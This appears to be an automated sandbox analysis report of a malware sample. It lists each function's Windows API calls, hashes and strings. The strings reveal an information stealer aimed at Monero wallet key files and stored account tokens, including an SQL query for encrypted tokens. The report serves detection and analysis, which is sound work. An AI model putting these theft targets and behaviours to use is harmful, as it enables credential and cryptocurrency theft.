                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AE4839
                            • Part of subcall function 00AE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AE4849
                          • InternetOpenA.WININET(00B00DF7,00000001,00000000,00000000,00000000), ref: 00AE610F
                          • StrCmpCA.SHLWAPI(?,0179E258), ref: 00AE6147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00AE618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00AE61B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00AE61DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00AE620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00AE6249
                          • InternetCloseHandle.WININET(?), ref: 00AE6253
                          • InternetCloseHandle.WININET(00000000), ref: 00AE6260
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: 48b9aed343f34aaa6497481b24e41af994f645af8f422db1d4cfe8f7f7ad7c80
                          • Instruction ID: b14e5ccc4069b691bb235d113aee6fa46d9e313622aee65c11343a51b6f0c291
                          • Opcode Fuzzy Hash: 48b9aed343f34aaa6497481b24e41af994f645af8f422db1d4cfe8f7f7ad7c80
                          • Instruction Fuzzy Hash: 7D5182B1A00208ABDB20DF95DD45BEE77B8EB14741F108598B709A72C0DB746A86CFA5
                          Function 00AEBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                          • lstrlen.KERNEL32(00000000), ref: 00AEBC9F
                            • Part of subcall function 00AF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AF8E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 00AEBCCD
                          • lstrlen.KERNEL32(00000000), ref: 00AEBDA5
                          • lstrlen.KERNEL32(00000000), ref: 00AEBDB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: 59b8c5467ab40fd1c95478ec0e43a682d0eb43b2c8a5abbccadd8235c77c64b2
                          • Instruction ID: 439f2b7c9123838a267cf1c72b3082e283d30600ee00d9994679e93cab0c1368
                          • Opcode Fuzzy Hash: 59b8c5467ab40fd1c95478ec0e43a682d0eb43b2c8a5abbccadd8235c77c64b2
                          • Instruction Fuzzy Hash: 81B158B191010C9BDB14FBE4CE96DFE7378AF64340F404568F60AA6191EF746A49CBB2
                          Function 00AF6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: 2ba82ed485d9f0d13b4fe4017ed67b69ee4772d7115244f7bef21e616b20d1af
                          • Instruction ID: 1b61a71b0a2387a06583d3295f04e6fc048d52e32acc65b95dc1d63665560193
                          • Opcode Fuzzy Hash: 2ba82ed485d9f0d13b4fe4017ed67b69ee4772d7115244f7bef21e616b20d1af
                          • Instruction Fuzzy Hash: E4F03A30904309EFD354AFE8A90972CBB70FB24702F040199E609C7390D6704A429BEA
                          Function 00AE4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00AE4FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AE4FD1
                          • InternetOpenA.WININET(00B00DDF,00000000,00000000,00000000,00000000), ref: 00AE4FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00AE5011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00AE5041
                          • InternetCloseHandle.WININET(?), ref: 00AE50B9
                          • InternetCloseHandle.WININET(?), ref: 00AE50C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: cc8d82bf7221871c23da6d32ade5498071e38a2fae538c998007a9a3f49eb580
                          • Instruction ID: 7e8d12da4c18a796ca1bc4e0b1009c41d7b9f2bc619a300d9419bd5a849790f7
                          • Opcode Fuzzy Hash: cc8d82bf7221871c23da6d32ade5498071e38a2fae538c998007a9a3f49eb580
                          • Instruction Fuzzy Hash: E63107B4A00218ABDB20DF54DD85BDCB7B4EB48704F1081E9FB09A7281C7706EC58FA9
                          Function 00AF83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00AF8426
                          • wsprintfA.USER32 ref: 00AF8459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00AF847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00AF848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00AF8499
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                          • RegQueryValueExA.ADVAPI32(00000000,0179D9F0,00000000,000F003F,?,00000400), ref: 00AF84EC
                          • lstrlen.KERNEL32(?), ref: 00AF8501
                          • RegQueryValueExA.ADVAPI32(00000000,0179DA20,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00B00B34), ref: 00AF8599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00AF8608
                          • RegCloseKey.ADVAPI32(00000000), ref: 00AF861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: b35ac0601448dbfd49892a9fdb61e13ecf4016ae850a9b35d58e466a3969d242
                          • Instruction ID: 7a86480a04b3df9ae176fb4ab25765fea8c14108f0943b3a6e110273e1db6e91
                          • Opcode Fuzzy Hash: b35ac0601448dbfd49892a9fdb61e13ecf4016ae850a9b35d58e466a3969d242
                          • Instruction Fuzzy Hash: 2521E7B191021CABDB64DB54DC85FE9B7B8FB48700F00C5D9B609A6280DF756A86CFE4
                          Function 00AF7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AF76A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF76AB
                          • RegOpenKeyExA.ADVAPI32(80000002,0178B870,00000000,00020119,00000000), ref: 00AF76DD
                          • RegQueryValueExA.ADVAPI32(00000000,0179DA08,00000000,00000000,?,000000FF), ref: 00AF76FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00AF7708
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: bb34234c515c351bead8b493400d9bc6a665e502a15194588c4ba7a62d550919
                          • Instruction ID: 689514dc5d43bdd70c89c08064a602eadc3f53bcbf166dc76b8f55795d8e3cfa
                          • Opcode Fuzzy Hash: bb34234c515c351bead8b493400d9bc6a665e502a15194588c4ba7a62d550919
                          • Instruction Fuzzy Hash: 010162B5A04309BBE710EBE8DD49F7DB7B8EB58701F104455FB04D7390E67099018B61
                          Function 00AF7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AF7734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF773B
                          • RegOpenKeyExA.ADVAPI32(80000002,0178B870,00000000,00020119,00AF76B9), ref: 00AF775B
                          • RegQueryValueExA.ADVAPI32(00AF76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00AF777A
                          • RegCloseKey.ADVAPI32(00AF76B9), ref: 00AF7784
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 7064f06c3b62842fc70031ede88245822f53589f7f1c205aec9e2a33da7d5af5
                          • Instruction ID: c88cccfbcc8d84433a067cd986887f0bf16ec7fa5b34ed64e40455a52e66ca47
                          • Opcode Fuzzy Hash: 7064f06c3b62842fc70031ede88245822f53589f7f1c205aec9e2a33da7d5af5
                          • Instruction Fuzzy Hash: 550144B5A40308BBDB10DBE4DC49FAEB7B8EB54700F104555FA05E7281D67059018B61
                          Function 00AF40B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00AF40D5
                          • RegOpenKeyExA.ADVAPI32(80000001,0179D6E0,00000000,00020119,?), ref: 00AF40F4
                          • RegQueryValueExA.ADVAPI32(?,0179DB10,00000000,00000000,00000000,000000FF), ref: 00AF4118
                          • RegCloseKey.ADVAPI32(?), ref: 00AF4122
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF4147
                          • lstrcat.KERNEL32(?,0179DD68), ref: 00AF415B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValuememset
                          • String ID:
                          • API String ID: 2623679115-0
                          • Opcode ID: b2ab8835232dfbea40311d1bf88ba8abdf17708267f94c5ee16ae71de2bb2682
                          • Instruction ID: 6bbbd4e40b1e40fcd43d01a24152d63689cbc3ab5f927e80a750ca5c6fd88cbb
                          • Opcode Fuzzy Hash: b2ab8835232dfbea40311d1bf88ba8abdf17708267f94c5ee16ae71de2bb2682
                          • Instruction Fuzzy Hash: 7D4176B69002086BDF24EBE4DD46FFE737DEB98300F004558B71597181EA759B898BA2
                          Function 00AE99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AE99EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AE9A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00AE9A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,00AE148F,00000000), ref: 00AE9A5A
                          • LocalFree.KERNEL32(00AE148F), ref: 00AE9A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00AE9A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: b8ce861d2f925c2676eda2719e7daa675855dc8958c742f87b1a345336245c85
                          • Instruction ID: 291ee0944f280f647081d7a28ae389e650ae5dd71ca1c511836646da85f7a595
                          • Opcode Fuzzy Hash: b8ce861d2f925c2676eda2719e7daa675855dc8958c742f87b1a345336245c85
                          • Instruction Fuzzy Hash: 0C31F6B4A00309EFDB24CF95D985BAEB7B5FF58340F108168E915A7390D774AA42CFA1
                          Function 00AFC84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
